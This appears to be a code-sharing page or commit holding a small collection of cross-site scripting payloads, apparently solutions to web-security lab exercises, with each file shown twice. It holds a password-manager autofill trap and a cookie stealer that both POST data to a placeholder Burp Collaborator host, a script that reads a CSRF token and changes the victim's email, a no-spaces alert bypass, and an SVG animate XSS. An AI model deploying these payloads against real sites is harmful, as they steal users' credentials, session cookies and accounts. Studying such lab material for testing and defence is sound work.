Ryman · September 6, 2022 21:43
diff --git a/capture-passwords.js b/capture-passwords.js
 // if users use password managers to autofill credentials
 <input name='username' id='username'>
 <input type='password' name='password' onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
 method:'POST',
 mode: 'no-cors',
 body:username.value+':'+this.value
 });">
diff --git a/exception-handler.js b/exception-handler.js
 # The exploit uses exception handling to call the alert function with arguments. 
 # The throw statement is used, separated with a blank comment in order to get round the no spaces restriction. 
 # The alert function is assigned to the onerror exception handler.
 # As throw is a statement, it cannot be used as an expression. Instead, we need to use arrow functions to create a block so that the throw statement can be used. 
 # We then need to call this function, so we assign it to the toString property of window and trigger this by forcing a string conversion on window.

 x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27
diff --git a/get-CSRF-token.js b/get-CSRF-token.js
 <script>
 var req = new XMLHttpRequest(); 
 req.onload = handleResponse; 
 req.open('get','/my-account',true); 
 req.send();
 function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest(); 
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
 };
 </script>
diff --git a/steal-cookies.js b/steal-cookies.js
 <script>
 fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {
 method: 'POST',
 mode: 'no-cors',
 body:document.cookie
 });
 </script>
diff --git a/svg-animate-xss.html b/svg-animate-xss.html
 %3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E%3C%2Fsvg%3E
 <svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a></svg>
	// if users use password managers to autofill credentials
	<input name='username' id='username'>
	<input type='password' name='password' onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
	method:'POST',
	mode: 'no-cors',
	body:username.value+':'+this.value
	});">
	# The exploit uses exception handling to call the alert function with arguments.
	# The throw statement is used, separated with a blank comment in order to get round the no spaces restriction.
	# The alert function is assigned to the onerror exception handler.
	# As throw is a statement, it cannot be used as an expression. Instead, we need to use arrow functions to create a block so that the throw statement can be used.
	# We then need to call this function, so we assign it to the toString property of window and trigger this by forcing a string conversion on window.

	x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27
	<script>
	var req = new XMLHttpRequest();
	req.onload = handleResponse;
	req.open('get','/my-account',true);
	req.send();
	function handleResponse() {
	var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
	var changeReq = new XMLHttpRequest();
	changeReq.open('post', '/my-account/change-email', true);
	changeReq.send('csrf='+token+'&email=test@test.com')
	};
	</script>
	<script>
	fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {
	method: 'POST',
	mode: 'no-cors',
	body:document.cookie
	});
	</script>
	%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E%3C%2Fsvg%3E
	<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a></svg>